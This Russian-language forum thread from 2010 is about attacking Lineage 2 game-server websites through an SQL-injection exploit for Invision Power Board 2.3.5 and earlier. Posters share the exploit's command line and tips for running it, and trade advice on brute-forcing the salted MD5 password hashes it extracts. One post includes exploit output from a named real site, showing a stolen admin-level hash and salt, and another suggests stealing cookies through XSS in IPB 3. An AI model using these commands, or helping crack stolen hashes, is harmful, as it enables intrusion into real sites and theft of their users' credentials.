Re: Рабочая уязвимость на сайте сервера из топ15 l2top
Цитата:
Сообщение от Nickitee
Ну вот, я ввёл в [Ссылки могут видеть только зарегистрированные пользователи. ]
Хеш, салт, получил MD5, пошол в passpro, ввёл туда этот MD5, нажал брут форс, он у мя дет минут 10 пароли перебирал и ничего не нашол!
что я не так делаю? Oo
Используй лучше онлайн расшифровку хешей md5
Вот парочка из них
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
P.S. И эта уязвимость мало где работает( я имею виду сайты la2)
Думаете на АЧ выкладывали бы эту уязвимость и тем более без хайда
Последний раз редактировалось -=Angel=-; 22.03.2010 в 01:14.
Re: Рабочая уязвимость на l2europe.net (сервер из топ15)
Цитата:
Сообщение от Death_AnGel
если дергал этим сплойтом, то хеш ипб.
md5($md5(salt).md5($pass)) [PHP]
Эммм, кажеться md5(md5($salt).md5($pass))
А не md5($md5(salt).md5($pass))
Добавлено через 1 час 18 минут
Расстреляйте меня, уже час бручу хэш, толку 0, незнаю может я не те настройки поставил, опытным брутерам: "Помогите рассшифровать хэш!"
хэш:f8e929c512b16d5f8b2b285d62a148f7
соль:hAh.S
________________
We are Ducks. We are birds. We like bread. We cryack. Cryack.
Последний раз редактировалось Nickitee; 23.03.2010 в 19:17.
Причина: Добавлено сообщение
Re: Рабочая уязвимость на l2europe.net (сервер из топ15)
Цитата:
Сообщение от Death_AnGel
если дергал этим сплойтом, то хеш ипб.
md5($md5(salt).md5($pass)) [PHP]
Не подходит я спецом та зарегал свой акк и пробывал пароль взломать вообше ничево не происходит. Помогите кто может я уже весь инет перерил толку 0 от етово.
З.Ы. Уже брутил и EGB / Paswordpro. 0%
Добавлено через 2 минуты
Цитата:
Сообщение от alexskb
ребят может кто научит не опытного ?
вот я пишу в цмд пхп.ехе но он не хочет его открывать...
можете объяснить по подробности?
Надо прописать путь к пхп.ехе, он просто так тибе не откроетса
Последний раз редактировалось {Spiker}; 23.03.2010 в 20:32.
Причина: Добавлено сообщение
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
denwer тащит
Добавлено через 10 часов 58 минут
у кого там на функции ereg() ругалось, денвер свой любимый посавьте версией пониже, где пхп старый в комплекте и zend optimizer
Последний раз редактировалось fuzzion; 24.03.2010 в 08:28.
Причина: Добавлено сообщение
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
Цитата:
Сообщение от Underwhy
/ Using default table prefix: ibf_
- Prefix ibf_ is incorrect!
- Mysql version 4
- Get prefix impossible!
Немного от ботана-Андервая: Это значит, что база форума имеет название не "ibf_" а какое либо другое. Вам это предстоит выяснить
Или 2 вариант, там стоит IPB 3
А с 3 этот баг не прокатит.
Уточню пару нюансов, если кто не понял, сплойт работает только на IPB <=2.3.5.
На 3 выдает что не парильный префикс, если посмотреть код то можно понять, что скрипт говорит форум уязвим при условии что при переходе по спец ссылке мы видим сам форум, именно поэтому он думает, что 3 уязвима.
На 3 сейчас есть из паблика активные и пассивные XSS, можно стырить куки и подменить сессию.
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
люди у меня когда я ввожу эту строку (php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные пользователи. ] -uid 6) получается вот что:
как переделать чтоб было как на видео
[Ссылки могут видеть только зарегистрированные пользователи. ]
хотелось бы чтоб было вот так:
[Ссылки могут видеть только зарегистрированные пользователи. ]
Последний раз редактировалось alexskb; 24.03.2010 в 11:02.
Re: Рабочая уязвимость на сайте сервера из топ15 l2top
Цитата:
Сообщение от alexskb
люди у меня когда я ввожу эту строку (php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные пользователи. ] -uid 6) получается вот что:
как переделать чтоб было как на видео
Поставить более старую версию Денвера, либо скачать отдельно пхп
Держи:
Код:
Attack(s):
+ [24.03.2010 13:02:10]
+ http://thevoshod.ru/forum/
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 6
/ Trying to get the password hash
+ pass_hash=a4f9fac3593d000d3f4d03e3b668c43d
+ Ok, using hash a4f9fac3593d000d3f4d03e3b668c43d
/ Trying to get the password salt
+ pass_salt=!)#@7
+ Ok, using salt !)#@7
+ Enjoy!
+ [24.03.2010 13:05:34]
+ Total: 182